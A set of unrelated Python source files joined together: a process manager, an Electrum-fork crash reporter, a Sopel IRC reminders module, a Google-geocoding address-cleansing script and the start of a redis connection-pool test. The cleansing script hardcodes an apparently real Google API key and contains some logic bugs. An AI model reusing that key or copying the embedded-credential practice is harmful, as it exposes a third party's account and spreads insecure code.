def _thread_target(self):
while True:
# 1s timeout so that if the parent dies this thread will die after 1s
try:
func, args, kwargs = self._job_queue.get(timeout=1)
except Queue.Empty:
continue
try:
func(*args, **kwargs)
except Exception:
pass
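# --- Illustrative usage sketch (not part of the original module) ---
# A minimal, hypothetical example of firing work into the pool; note that
# results are never returned and jobs are silently dropped once the queue
# is full.
#
#   pool = ThreadPool(num_threads=4, queue_size=100)
#   accepted = pool.fire_async(log.info, args=['job ran'])
#   if not accepted:
#       log.warning('thread pool queue is full, job dropped')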
class ProcessManager(object):
'''
A class which will manage processes that should be running
'''
def __init__(self, name=None, wait_for_kill=1):
# pid -> {tgt: foo, Process: object, args: args, kwargs: kwargs}
self._process_map = {}
self.name = name
if self.name is None:
self.name = self.__class__.__name__
self.wait_for_kill = wait_for_kill
# store some pointers for the SIGTERM handler
self._pid = os.getpid()
self._sigterm_handler = signal.getsignal(signal.SIGTERM)
def add_process(self, tgt, args=None, kwargs=None):
'''
        Create a process with the given args + kwargs
        This will determine whether tgt is a Process subclass, otherwise it
        assumes it is a function
'''
if args is None:
args = []
if kwargs is None:
kwargs = {}
if type(multiprocessing.Process) == type(tgt) and issubclass(tgt, multiprocessing.Process):
p = tgt(*args, **kwargs)
else:
p = multiprocessing.Process(target=tgt, args=args, kwargs=kwargs)
p.start()
log.debug("Started '{0}' with pid {1}".format(tgt.__name__, p.pid))
self._process_map[p.pid] = {'tgt': tgt,
'args': args,
'kwargs': kwargs,
'Process': p}
def restart_process(self, pid):
'''
Create new process (assuming this one is dead), then remove the old one
'''
log.info(('Process {0} ({1}) died with exit status {2},'
' restarting...').format(self._process_map[pid]['tgt'],
pid,
self._process_map[pid]['Process'].exitcode))
# don't block, the process is already dead
self._process_map[pid]['Process'].join(1)
self.add_process(self._process_map[pid]['tgt'],
self._process_map[pid]['args'],
self._process_map[pid]['kwargs'])
del self._process_map[pid]
def run(self):
'''
Load and start all available api modules
'''
salt.utils.appendproctitle(self.name)
# make sure to kill the subprocesses if the parent is killed
signal.signal(signal.SIGTERM, self.kill_children)
try:
if HAS_PYTHON_SYSTEMD and systemd.daemon.booted():
systemd.daemon.notify('READY=1')
except SystemError:
# Daemon wasn't started by systemd
pass
while True:
try:
# in case someone died while we were waiting...
self.check_children()
pid, exit_status = os.wait()
if pid not in self._process_map:
log.debug(('Process of pid {0} died, not a known'
' process, will not restart').format(pid))
continue
self.restart_process(pid)
# OSError is raised if a signal handler is called (SIGTERM) during os.wait
except OSError:
break
def check_children(self):
'''
Check the children once
'''
for pid, mapping in six.iteritems(self._process_map):
if not mapping['Process'].is_alive():
self.restart_process(pid)
def kill_children(self, *args):
'''
Kill all of the children
'''
# check that this is the correct process, children inherit this
# handler, if we are in a child lets just run the original handler
if os.getpid() != self._pid:
if callable(self._sigterm_handler):
return self._sigterm_handler(*args)
elif self._sigterm_handler is not None:
return signal.default_int_handler(signal.SIGTERM)(*args)
else:
return
for pid, p_map in self._process_map.items():
p_map['Process'].terminate()
end_time = time.time() + self.wait_for_kill # when to die
while self._process_map and time.time() < end_time:
for pid, p_map in self._process_map.items():
p_map['Process'].join(0)
# This is a race condition if a signal was passed to all children
try:
del self._process_map[pid]
except KeyError:
pass
        # kill any child that is still alive after the grace period
        for pid in self._process_map:
            try:
                os.kill(pid, signal.SIGKILL)
# in case the process has since decided to die, os.kill returns OSError
except OSError:
pass
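# --- Illustrative usage sketch (not part of the original module) ---
# A hypothetical wiring of ProcessManager; worker() and opts are assumed
# application-level objects, not something defined here.
#
#   manager = ProcessManager(name='MyDaemon')
#   manager.add_process(worker, args=[opts])
#   manager.add_process(worker, args=[opts])
#   manager.run()    # blocks, restarting children that die, until SIGTERM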
|
base_crash_reporter.py
|
# Electrum - lightweight Bitcoin client
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import json
import locale
import traceback
import sys
import queue
from .version import ELECTRUM_VERSION
from . import constants
from .i18n import _
from .util import make_aiohttp_session
from .logging import describe_os_version, Logger, get_git_version
class BaseCrashReporter(Logger):
report_server = "https://crashhub.electrum.plcultima.info/"
config_key = "show_crash_reporter"
issue_template = """<h2>Traceback</h2>
<pre>
{traceback}
</pre>
<h2>Additional information</h2>
<ul>
<li>Electrum version: {app_version}</li>
<li>Python version: {python_version}</li>
<li>Operating system: {os}</li>
<li>Wallet type: {wallet_type}</li>
<li>Locale: {locale}</li>
</ul>
"""
CRASH_MESSAGE = _('Something went wrong while executing Electrum.')
CRASH_TITLE = _('Sorry!')
REQUEST_HELP_MESSAGE = _('To help us diagnose and fix the problem, you can send us a bug report that contains '
'useful debug information:')
DESCRIBE_ERROR_MESSAGE = _("Please briefly describe what led to the error (optional):")
ASK_CONFIRM_SEND = _("Do you want to send this report?")
USER_COMMENT_PLACEHOLDER = _("Do not enter sensitive/private information here. "
"The report will be visible on the public issue tracker.")
def __init__(self, exctype, value, tb):
Logger.__init__(self)
self.exc_args = (exctype, value, tb)
def send_report(self, asyncio_loop, proxy, endpoint="/crash", *, timeout=None):
if constants.net.GENESIS[-4:] not in ["29a0", "bfe2"] and ".electrum.plcultima.info" in BaseCrashReporter.report_server:
# Gah! Some kind of altcoin wants to send us crash reports.
raise Exception(_("Missing report URL."))
report = self.get_traceback_info()
report.update(self.get_additional_info())
report = json.dumps(report)
coro = self.do_post(proxy, BaseCrashReporter.report_server + endpoint, data=report)
response = asyncio.run_coroutine_threadsafe(coro, asyncio_loop).result(timeout)
return response
async def do_post(self, proxy, url, data):
async with make_aiohttp_session(proxy) as session:
async with session.post(url, data=data, raise_for_status=True) as resp:
return await resp.text()
def get_traceback_info(self):
exc_string = str(self.exc_args[1])
stack = traceback.extract_tb(self.exc_args[2])
readable_trace = self.__get_traceback_str_to_send()
id = {
"file": stack[-1].filename,
"name": stack[-1].name,
"type": self.exc_args[0].__name__
}
return {
"exc_string": exc_string,
"stack": readable_trace,
"id": id
}
def get_additional_info(self):
args = {
"app_version": get_git_version() or ELECTRUM_VERSION,
"python_version": sys.version,
"os": describe_os_version(),
"wallet_type": "unknown",
"locale": locale.getdefaultlocale()[0] or "?",
"description": self.get_user_description()
}
try:
args["wallet_type"] = self.get_wallet_type()
except:
# Maybe the wallet isn't loaded yet
pass
return args
def __get_traceback_str_to_send(self) -> str:
# make sure that traceback sent to crash reporter contains
# e.__context__ and e.__cause__, i.e. if there was a chain of
# exceptions, we want the full traceback for the whole chain.
return "".join(traceback.format_exception(*self.exc_args))
def _get_traceback_str_to_display(self) -> str:
# overridden in Qt subclass
return self.__get_traceback_str_to_send()
def get_report_string(self):
info = self.get_additional_info()
info["traceback"] = self._get_traceback_str_to_display()
return self.issue_template.format(**info)
def get_user_description(self):
raise NotImplementedError
def get_wallet_type(self) -> str:
raise NotImplementedError
class EarlyExceptionsQueue:
"""Helper singleton for explicitly sending exceptions to crash reporter.
Typically the GUIs set up an "exception hook" that catches all otherwise
uncaught exceptions (which unroll the stack of a thread completely).
This class provides methods to report *any* exception, and queueing logic
that delays processing until the exception hook is set up.
"""
_is_exc_hook_ready = False
_exc_queue = queue.Queue()
@classmethod
def set_hook_as_ready(cls):
if cls._is_exc_hook_ready:
return
cls._is_exc_hook_ready = True
while cls._exc_queue.qsize() > 0:
e = cls._exc_queue.get()
cls._send_exception_to_crash_reporter(e)
@classmethod
def send_exception_to_crash_reporter(cls, e: BaseException):
if cls._is_exc_hook_ready:
cls._send_exception_to_crash_reporter(e)
else:
cls._exc_queue.put(e)
@staticmethod
def _send_exception_to_crash_reporter(e: BaseException):
assert EarlyExceptionsQueue._is_exc_hook_ready
sys.excepthook(type(e), e, e.__traceback__)
send_exception_to_crash_reporter = EarlyExceptionsQueue.send_exception_to_crash_reporter
def trigger_crash():
# note: do not change the type of the exception, the message,
# or the name of this method. All reports generated through this
# method will be grouped together by the crash reporter, and thus
# don't spam the issue tracker.
class TestingException(Exception):
pass
def crash_test():
raise TestingException("triggered crash for testing purposes")
import threading
t = threading.Thread(target=crash_test)
t.start()
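# --- Illustrative wiring sketch (not part of the original module) ---
# A hypothetical GUI setup: install an exception hook that forwards to a
# BaseCrashReporter subclass, then mark the hook ready so exceptions queued
# early via EarlyExceptionsQueue are flushed. MyCrashReporter is an assumption.
#
#   def exception_hook(exctype, value, tb):
#       MyCrashReporter(exctype, value, tb).show()
#
#   sys.excepthook = exception_hook
#   EarlyExceptionsQueue.set_hook_as_ready()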
|
reminders.py
|
"""This module allows to set and manage reminders."""
from __future__ import (
unicode_literals,
absolute_import,
print_function,
division
)
import os
import re
import time
import threading
import collections
import codecs
from datetime import datetime
from sopel.module import commands, example, NOLIMIT
import sopel.tools
from sopel.tools.time import get_timezone, format_time
try:
import pytz
except ImportError:
pytz = None
def filename(self):
"""Format filename of reminders database file."""
name = self.nick + '-' + self.config.core.host + '.reminders.db'
return os.path.join(self.config.core.homedir, name)
def load_database(name):
"""Load reminders from database file."""
data = {}
if os.path.isfile(name):
f = codecs.open(name, 'r', encoding='utf-8')
for line in f:
unixtime, channel, nick, message = line.split('\t')
message = message.rstrip('\n')
t = int(float(unixtime))
reminder = (channel, nick, message)
try:
data[t].append(reminder)
except KeyError:
data[t] = [reminder]
f.close()
return data
def dump_database(name, data):
"""Save reminders to database file."""
f = codecs.open(name, 'w', encoding='utf-8')
for unixtime, reminders in sopel.tools.iteritems(data):
for channel, nick, message in reminders:
f.write('%s\t%s\t%s\t%s\n' % (unixtime, channel, nick, message))
f.close()
def setup(bot):
"""Setup bot: start monitoring and sending reminders."""
bot.rfn = filename(bot)
bot.rdb = load_database(bot.rfn)
def monitor(bot):
time.sleep(5)
while True:
now = int(time.time())
unixtimes = [int(key) for key in bot.rdb]
oldtimes = [t for t in unixtimes if t <= now]
if oldtimes:
for oldtime in oldtimes:
for (channel, nick, message) in bot.rdb[oldtime]:
if message:
bot.msg(channel, nick + ': ' + message)
else:
bot.msg(channel, nick + '!')
del bot.rdb[oldtime]
dump_database(bot.rfn, bot.rdb)
time.sleep(2.5)
targs = (bot,)
t = threading.Thread(target=monitor, args=targs)
t.start()
scaling = collections.OrderedDict([
('years', 365.25 * 24 * 3600),
('year', 365.25 * 24 * 3600),
('yrs', 365.25 * 24 * 3600),
('y', 365.25 * 24 * 3600),
('months', 29.53059 * 24 * 3600),
('month', 29.53059 * 24 * 3600),
('mo', 29.53059 * 24 * 3600),
('weeks', 7 * 24 * 3600),
('week', 7 * 24 * 3600),
('wks', 7 * 24 * 3600),
('wk', 7 * 24 * 3600),
('w', 7 * 24 * 3600),
('days', 24 * 3600),
('day', 24 * 3600),
('d', 24 * 3600),
('hours', 3600),
('hour', 3600),
('hrs', 3600),
('hr', 3600),
('h', 3600),
('minutes', 60),
('minute', 60),
('mins', 60),
('min', 60),
('m', 60),
('seconds', 1),
('second', 1),
('secs', 1),
('sec', 1),
('s', 1),
])
periods = '|'.join(scaling.keys())
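# Worked example of how a duration like "3h45m" is decomposed (added for clarity,
# not part of the original module): re.split() with the periods pattern splits the
# arguments into the duration chunks '3h' and '45m' plus the trailing message text;
# the scaling table maps 'h' -> 3600 and 'm' -> 60, so the total duration is
# 3 * 3600 + 45 * 60 = 13500 seconds.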
@commands('in')
@example('.in 3h45m Release a new version of ZppixBot')
def remind(bot, trigger):
"""Give user a reminder in the given amount of time."""
if not trigger.group(2):
bot.say("Missing arguments for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message was given for the reminder. Perhaps you should "
"try again?")
return NOLIMIT
duration = 0
message = filter(None, re.split(
r'(\d+(?:\.\d+)? ?(?:(?i)' + periods + ')) ?',
trigger.group(2)
)[1:])
reminder = ''
stop = False
for piece in message:
grp = re.match(r'(\d+(?:\.\d+)?) ?(.*) ?', piece)
if grp and not stop:
length = float(grp.group(1))
factor = scaling.get(grp.group(2).lower(), 60)
duration += length * factor
else:
reminder = reminder + piece
stop = True
if duration == 0:
return bot.reply("Sorry, didn't understand. Please try again.")
if duration % 1:
duration = int(duration) + 1
else:
duration = int(duration)
timezone = get_timezone(
bot.db, bot.config, None, trigger.nick, trigger.sender)
create_reminder(bot, trigger, duration, reminder, timezone)
@commands('at')
@example('.at 13:47 Update the servers!')
def at(bot, trigger):
"""
Give user a reminder at the given time.
Time format: hh:mm:ss.
To see what timezone is used, type .getchanneltz (if setting a reminder
in an IRC channel) or .gettz (elsewhere)
"""
if not trigger.group(2):
bot.say("No arguments given for reminder command.")
return NOLIMIT
if trigger.group(3) and not trigger.group(4):
bot.say("No message was given for the reminder. Perhaps you should "
"try again?")
return NOLIMIT
regex = re.compile(r'(\d+):(\d+)(?::(\d+))?([^\s\d]+)? (.*)')
match = regex.match(trigger.group(2))
if not match:
bot.reply("Sorry, but I didn't understand, please try again.")
return NOLIMIT
hour, minute, second, tz, message = match.groups()
if not second:
second = '0'
if pytz:
timezone = get_timezone(bot.db, bot.config, tz,
trigger.nick, trigger.sender)
if not timezone:
timezone = 'UTC'
now = datetime.now(pytz.timezone(timezone))
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second),
tzinfo=now.tzinfo)
timediff = at_time - now
else:
if tz and tz.upper() != 'UTC':
bot.reply("I don't have timezone support installed.")
return NOLIMIT
now = datetime.now()
at_time = datetime(now.year, now.month, now.day,
int(hour), int(minute), int(second))
timediff = at_time - now
duration = timediff.seconds
if duration < 0:
duration += 86400
create_reminder(bot, trigger, duration, message, 'UTC')
def create_reminder(bot, trigger, duration, message, tz):
"""Create reminder within specified period of time and message."""
t = int(time.time()) + duration
reminder = (trigger.sender, trigger.nick, message)
try:
bot.rdb[t].append(reminder)
except KeyError:
bot.rdb[t] = [reminder]
dump_database(bot.rfn, bot.rdb)
if duration >= 60:
remind_at = datetime.utcfromtimestamp(t)
timef = format_time(bot.db, bot.config, tz, trigger.nick,
trigger.sender, remind_at)
bot.reply('Okay, I will set the reminder for: %s' % timef)
else:
bot.reply('Okay, I will send the reminder in %s secs' % duration)
@commands('cancelreminder')
@example('.cancelreminder (insert reminder message here)')
def cancel(bot, trigger):
"""Cancel reminder."""
bot.reply(('Pinging MacFan4000, Reception123, or Zppix to cancel '
'{}\'s reminder.').format(trigger.nick))
|
PotentialMatch_Cleanser.py
|
#!/usr/bin/python
"""
POTENTIAL ADDRESS CLEANSING BASED ON GOOGLE GEOCODER API and SequenceMatcher
RETURNS THE CROSS STREETS, POTENTIAL BUSINESSES AND THE NO MATCHES
"""
import json
import logging
import os
import re
import uuid
from difflib import SequenceMatcher
import itertools
import requests
import sys
import threading
import time
logger = logging.getLogger("root")
logger.setLevel(logging.DEBUG)
ch = logging.StreamHandler()
ch.setLevel(logging.DEBUG)
logger.addHandler(ch)
shoppingstreet_path = "data/output_files/shoppingstreet.json"
city_path = "data/output_files/city.json"
input_filename = "data/output_files/potential_match.json"
input_filename1 = 'data/intern_database/dictionary1.txt'
input_filename2 = 'data/intern_database/dictionary2.txt'
input_filename3 = 'data/intern_database/dictionary3.txt'
input_filename4 = 'data/intern_database/streetvocabulary_types.txt'
input_filename5 = 'data/intern_database/business_types.txt'
cross_streetsfile_path = "data/output_files/cross_streets.json"
nomatchfile_path = "data/output_files/no_match.json"
valid_address_path = "data/output_files/valid_address.json"
cross_streets_count = 0
no_match_count = 0
cross_streets = []
potential_match = []
done = False
# ------------------ DATA LOADING ---------------------------------------------
# loading potential matches file
with open(input_filename, 'r') as outfile:
addresses = json.load(outfile)
outfile.close()
# loading dictionary OSM germany streets ( Dictionary1 )
with open(input_filename1, 'r') as outfile:
dictionary1 = outfile.read()
dictionary1 = dictionary1.split("\n")
outfile.close()
# loading dictionary Street Vocabularies ( Dictionary2 )
with open(input_filename2, 'r') as outfile:
dictionary2 = outfile.read()
dictionary2 = dictionary2.split("\n")
outfile.close()
# loading dictionary no business ( Dictionary3 )
with open(input_filename3, 'r') as outfile:
dictionary3 = outfile.read()
if len(dictionary3) > 0:
dictionary3 = dictionary3.split("\n")
else:
dictionary3 = []
outfile.close()
# loading StreetVocabulary Types
with open(input_filename4, 'r') as outfile:
vocab_type = outfile.read()
vocab_type = vocab_type.split("\n")
outfile.close()
# loading business Types
with open(input_filename5, 'r') as outfile:
business_type = outfile.read()
business_type = business_type.split("\n")
outfile.close()
# ----------------- FUNCTION DEFINITIONS --------------------------------
def animate():
"""
animation function for the terminal
"""
for c in itertools.cycle(['|', '/', '-', '\\']):
if done:
break
sys.stdout.write('\rloading ' + c)
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\r Done! ')
def similar(a, b):
"""
:param a: string
:param b: string
:return: ratio of matching
"""
return SequenceMatcher(None, a, b).ratio()
def similarL(a, b, ratio):
"""
    return the first string in b whose similarity ratio with a exceeds ratio
    :param a: String
    :param b: List of strings
    :return: the matching string, or False if none exceeds the ratio
"""
for x in b:
if SequenceMatcher(None, a, x).ratio() > ratio:
return x
return False
def similarL1(a, b):
"""
    check whether any string in b occurs (case-insensitively) in a
:param a: String
:param b: List of strings
:return: boolean
"""
for x in b:
if x.lower() in a.lower():
return True
return False
def similarL2(a, b, ratio):
"""
    case-insensitive variant of similarL: return the first string in b whose similarity ratio with a exceeds ratio
    :param a: String
    :param b: List of strings
    :return: the matching string, or False if none exceeds the ratio
"""
for x in b:
if SequenceMatcher(None, a.lower(), x.lower()).ratio() > ratio:
return x
return False
def index_of(val, in_list):
"""
:param val: String variable to test
:param in_list: list of Strings
:return: index of the value if it's in the list
"""
try:
return in_list.index(val)
except ValueError:
return -1
def get_street_name(street_id):
"""
:param street_id: String shopping street id to check
:return: street name related, from shoppingstreet.json
"""
street_name = None
with open(shoppingstreet_path, "r+") as shop_check:
shop_check.seek(0, os.SEEK_SET)
shops = json.load(shop_check)
shop_check.close()
for shop in shops:
if shop["street_id"] in street_id:
street_name = shop["name"]
return street_name
def get_citiy_name(city_id):
"""
:param city_id: String city id to check
:return: city name related, from city.json
"""
city_name = None
with open(city_path, "r+") as city_check:
city_check.seek(0, os.SEEK_SET)
cities = json.load(city_check)
city_check.close()
for citie in cities:
if citie["city_id"] in city_id:
city_name = citie["name"]
return city_name
def get_cross_streets(address, related):
"""
:param address:
:return: True if entry is a cross street
"""
    pattern0 = re.compile(r"-$")
dic_pattern = {"strasse", "straße", "weg", "platz", "übergang", "durchgang", "allee"}
address = address.replace('str.', 'straße')
address = address.replace('pl.', 'platz')
if -1 < address.find("-") < len(address) - 1:
address = re.sub("-", " ", address)
if len(address) < 7:
return False
for lines in dictionary1:
if pattern0.search(address):
for line in dic_pattern:
if similar(re.sub(pattern0, line, address), lines) > 0.97:
return lines
if similar(address, lines) > 0.97:
return lines
if 0.6 < similar(address, lines) < 0.7:
for item in related:
if (similar((address + " " + item), lines) > 0.9 or similar((item + " " + address), lines) > 0.9) and (
len(item) > 2):
return lines
return False
def is_cross_street(street1, street2, city):
"""
Test if 2 street crosses
:param street1: String street name 2
:param street2: String street name 1
:param city: String city name
:return: boolean
"""
if "intersection" in get_google_results("geocoding", [street1, street2, city], return_response_fields=None)[0][
"type"]:
return True
return False
def get_google_results(api_id, address, return_response_fields=None):
"""
    Get results from the Google Maps Geocoding API or the Places Nearby Search API
    @param address: List of three strings [building, street, city], e.g. ["Starbucks", "Alexanderplatz", "Berlin"].
    The elements are joined into a single query string; their meaning may vary based on the API used.
    @param api_id: String that selects which API is requested:
    "geocoding": Geocoding API
    "nearbysearch": Places Nearby Search API
    @param return_response_fields: None/String. If None, the full parsed result list is returned;
    otherwise only the named field is kept per result, e.g. "latitude" or "route_name".
"""
# set up api key
api_key = "AIzaSyDQaVh67imEZW2FLH7hb33SB63jv2shkqQ"
request_url = ""
outputs = []
building = address[0]
address = address[0] + " " + address[1] + " " + address[2]
if api_id == "geocoding":
request_url = "https://maps.googleapis.com/maps/api/geocode/json?address={}".format(address) + "&key={}".format(
api_key)
if api_id == "nearbysearch":
lat_long = get_google_results(1, address,
return_response_fields="latitude").__str__() + "," + get_google_results(
1, address, return_response_fields="longitude").__str__()
request_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={}".format(
lat_long) + "&rankby=distance&type=establishment&key={}".format(api_key)
results = requests.get(request_url)
results = results.json()
if len(results['results']) == 0:
outputs = ""
else:
for answer in results['results']:
if api_id == "geocoding":
output = {
"entry": building,
"street_number": [y['long_name'] for y in answer.get('address_components') if
'street_number' in y.get('types')],
"route_name": [z['long_name'] for z in answer.get('address_components') if
'route' in z.get('types')],
"latitude": answer.get('geometry').get('location').get('lat'),
"longitude": answer.get('geometry').get('location').get('lng'),
"google_place_id": answer.get("place_id"),
"type": ",".join(answer.get('types')),
"postcode": ",".join(
[x['long_name'] for x in answer.get('address_components') if 'postal_code' in x.get('types')]),
}
if len(output["street_number"]) < 1:
output["street_number"] = ["0"]
if len(output["route_name"]) < 1:
output["route_name"] = [answer.get('formatted_address')]
if "intersection" in output["type"]:
output["route_name"] = [building]
outputs += [output]
if return_response_fields is None:
return outputs
else:
output_filter = []
for item in outputs:
output_filter += [{"" + return_response_fields: item[return_response_fields]}]
outputs = output_filter
return outputs
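# Note (added for clarity): each geocoding result returned above is a dict with the
# keys "entry", "street_number", "route_name", "latitude", "longitude",
# "google_place_id", "type" and "postcode"; when return_response_fields is set,
# only that single field is kept per result.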
print(
"\n ################################# Potential Matches Cleanser ######################################################")
t = threading.Thread(target=animate)
t.start()
result_google = []
vocabulary = []
business = []
vocabularies = []
businesses = []
for potential in addresses:
street_id = potential["street_id"]
city_id = potential["city_id"]
street_name = get_street_name(street_id)
city_name = get_citiy_name(city_id)
# check if the street is already been cleaned
# loading valid_address file
valid_found = 0
if os.stat(valid_address_path).st_size > 0:
with open(valid_address_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
for v in valids:
if v["street_id"] == street_id: valid_found += 1
# ----- PROCESS 1 -------------CROSS STREETS FILTERING ---------------------------------
if valid_found < 1:
related_building = set()
cross_street = [{"street_id": potential["street_id"], "cross_streets": []}]
for item in potential["building"]: related_building.add(item)
for j in potential["building"]:
cr_str = get_cross_streets(j.lower(), related_building)
if cr_str is not False:
cross_street[len(cross_street) - 1]["cross_streets"] += [
{"cross_street_id": uuid.uuid4().__str__(), "name": cr_str.lower()}]
cross_streets_count += 1
potential["building"][index_of(j, potential["building"])] = ""
if cross_streets_count > 0: cross_streets += cross_street
print(
"\n ---------------------------- Cross Streets found with OSM's Streets database --------------------------------------")
print(json.dumps(cross_streets, ensure_ascii=False, indent=4))
# ------------------ BUSINESS & STREET VOCABULARIES FILTERING ---------------------------
# check if result have cross street:
for potential in addresses:
street_id = potential["street_id"]
city_id = potential["city_id"]
street_name = get_street_name(street_id)
city_name = get_citiy_name(city_id)
vocabulary = [{"street_id": street_id, "vocabulary": [], "nobusiness": []}]
vocabulary_count = 0
business = [{"street_id": street_id, "building": []}]
no_business_count = 0
business_count = 0
# check if the street is already been cleaned
# loading valid_address file
valid_found = 0
if os.stat(valid_address_path).st_size > 0:
with open(valid_address_path, 'r') as outfile:
valids = json.load(outfile)
outfile.close()
for v in valids:
if v["street_id"] == street_id: valid_found += 1
if valid_found < 1:
for entry in potential["building"]:
if len(entry) > 0:
is_not_similar = 0
if similarL1(entry.lower(), dictionary2):
vocabulary[len(vocabulary) - 1]["vocabulary"] += {entry.lower()}
vocabulary_count += 1
is_not_similar += 1
if similarL1(entry.lower(), dictionary3):
vocabulary[len(vocabulary) - 1]["nobusiness"] += {entry.lower()}
vocabulary_count += 1
is_not_similar += 1
if is_not_similar < 1:
building = entry.lower()
result_google += get_google_results("geocoding", [building, street_name, city_name],
return_response_fields=None)
cross_street_list = set()
for c in cross_streets:
if c["street_id"] is potential["street_id"]:
for b in c["cross_streets"]:
cross_street_list.add(b["name"])
cross_street_list_count = len(cross_street_list)
if len(result_google) > 0:
for result in result_google:
if (is_cross_street(result["route_name"][0].lower(), street_name.lower(), city_name.lower())) and (
street_name.lower() not in result["route_name"][0].lower()) and \
(similarL2(result["route_name"][0], cross_street_list, 0.7) is False):
cross_street_list.add(result["route_name"][0])
count_found = 0
for c in cross_streets:
if c["street_id"] in potential["street_id"]:
for x in c["cross_streets"]:
if similar(result["route_name"][0].lower(), x["name"].lower()) > 0.7:
count_found += 1
if count_found < 1:
c["cross_streets"].extend([{"cross_street_id": uuid.uuid4().__str__(),
"name": result["route_name"][0].lower()}])
if similarL(result["route_name"][0].lower(), cross_street_list, 0.70) or street_name.lower() in \
result["route_name"][0].lower() or \
similarL1(result["route_name"][0].lower(), cross_street_list):
building_types = result["type"].split(",")
if len(set(building_types).intersection(vocab_type)) > len(
set(building_types).intersection(business_type)):
vocabulary[len(vocabulary) - 1]["vocabulary"] += {result["entry"].lower()}
vocabulary_count += 1
no_match_count += 1
dictionary2.append(result["entry"].lower())
if len(set(building_types).intersection(business_type)) > len(
set(building_types).intersection(vocab_type)):
business[len(business) - 1]["building"] += {result["google_place_id"]}
business_count += 1
if len(set(building_types).intersection(vocab_type)) < 1 and len(
set(building_types).intersection(business_type)) < 1 and (
"intersection" not in building_types):
vocabulary[len(vocabulary) - 1]["nobusiness"] += {result["entry"].lower()}
dictionary3.append(result["entry"].lower())
no_match_count += 1
if (len(vocabulary[len(vocabulary) - 1]["vocabulary"]) > 0):
vocabularies += vocabulary
if (len(business[len(vocabulary) - 1]["building"]) > 0):
businesses += business
result_google = []
print(
"\n ---------------------------------- Cross Streets after Google's verification ----------------------------------------------")
print(json.dumps(cross_streets, ensure_ascii=False, indent=4))
print("\n ---------------------------- Vocabularies & Nobusinesses --------------------------------------")
if (len(vocabularies) > 0):
print(json.dumps(vocabularies, ensure_ascii=False, indent=4))
else:
print("\n No Vocabularies found")
print("------------------------------All Businesses Retrieved ----------------------------------------")
if (len(businesses) > 0):
print(json.dumps(businesses, ensure_ascii=False, indent=4))
else:
print("\n No Businesses found")
print(dictionary2)
################## WRITING JSON FILES ###########################################
# cross_street.json data writing
if cross_streets_count > 0:
if os.stat(cross_streetsfile_path).st_size == 0 and cross_streets.__len__() > 0:
with open(cross_streetsfile_path, 'a+') as outfile:
json.dump(cross_streets, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(cross_streetsfile_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
cross_streets1 = cross_streets
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in cross_streets:
if street1["street_id"] == street["street_id"]:
street["cross_streets"] = street1["cross_streets"]
cross_streets1.remove(street1)
outfile.truncate(0)
if len(cross_streets1) > 0: matchjson_d.extend(cross_streets1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# dictionary2.txt data writing
if dictionary2.__len__() > 0:
with open(input_filename2, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
dictionary2 = "\n".join(dictionary2)
outfile.truncate(0)
outfile.write(dictionary2)
outfile.close()
# dictionary3.txt data writing
if dictionary3.__len__() > 0:
with open(input_filename3, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
dictionary3 = "\n".join(dictionary3)
outfile.truncate(0)
outfile.write(dictionary3)
outfile.close()
# No_Match.json data writing
if len(vocabularies) > 0:
if os.stat(nomatchfile_path).st_size == 0:
with open(nomatchfile_path, 'a+') as outfile:
json.dump(vocabularies, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(nomatchfile_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
vocabularies1 = vocabularies
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in vocabularies:
if street1["street_id"] == street["street_id"]:
street["vocabulary"] = street1["vocabulary"]
street["nobusiness"] = street1["nobusiness"]
vocabularies1.remove(street1)
outfile.truncate(0)
if len(vocabularies1) > 0: matchjson_d.extend(vocabularies1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
# Valid.json data writing
if len(businesses) > 0:
if os.stat(valid_address_path).st_size == 0:
with open(valid_address_path, 'a+') as outfile:
json.dump(businesses, outfile, ensure_ascii=False, indent=4)
outfile.close()
else:
with open(valid_address_path, 'a+') as outfile:
outfile.seek(0, os.SEEK_SET)
businesses1 = businesses
matchjson_d = json.load(outfile)
for street in matchjson_d:
for street1 in businesses:
if street1["street_id"] == street["street_id"]:
street["building"] = street1["building"] + street["building"]
businesses1.remove(street1)
outfile.truncate(0)
if len(businesses1) > 0: matchjson_d.extend(businesses1)
json.dump(matchjson_d, outfile, ensure_ascii=False, indent=4)
outfile.close()
done = True
|
test_connection_pool.py
|
import os
import re
import time
from threading import Thread
from unittest import mock
import pytest
import redis
from redis.connection import ssl_available, to_bool
from .conftest import _get_client, skip_if_redis_enterprise, skip_if_server_version_lt
from .test_pubsub import wait_for_message
class DummyConnection:
description_format = "DummyConnection<>"
def __init__(self, **kwargs):
self.kwargs = kwargs
self.pid = os.getpid()
def connect(self):
pass
def can_read(self):
return False
class TestConnectionPool:
def get_pool(
self,
